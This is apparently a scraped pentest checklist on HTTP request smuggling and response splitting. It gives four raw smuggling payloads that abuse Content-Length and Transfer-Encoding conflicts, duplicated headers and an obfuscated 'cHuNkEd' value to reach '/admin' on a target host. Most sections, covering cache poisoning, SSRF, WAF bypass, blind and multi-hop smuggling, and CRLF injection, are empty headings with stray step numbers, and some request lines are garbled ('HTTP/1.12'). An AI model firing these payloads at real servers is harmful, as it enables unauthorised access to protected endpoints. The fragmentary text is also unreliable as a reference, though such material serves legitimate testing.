HTTP Splitting Smuggling
Check List
Methodology
Black Box
1
POST /path HTTP/1.1
Host: target.com
Content-Length: 50
Transfer-Encoding: chunked
0
GET /admin HTTP/1.12
1
POST /path HTTP/2
Host: target.com
Transfer-Encoding: chunked
Transfer-Encoding: chunked
0
GET /admin HTTP/1.12
1
POST /path HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
Transfer-Encoding: chunked
0
GET /admin HTTP/1.12
Invalid TE Header Manipulation
1
POST /path HTTP/1.1
Host: vulnerable.com
Transfer-Encoding: cHuNkEd
Content-Length: 60
0
GET /admin HTTP/1.12
Cache Poisoning With HRS
1
2
SSRF With HRS
1
2
WAF Bypass With HRS
1
2
Blind HRS
1
2
Multi-Hop Proxy Smuggling
1
2
1
2
1
2
1
2
1
2
HTTP Response Splitting
1
2
1
2
1
2
1
2
CRLF Header Injection Via "redirect_uri" Parameter
1
2
3
4
5
White Box
Cheat Sheet
Last updated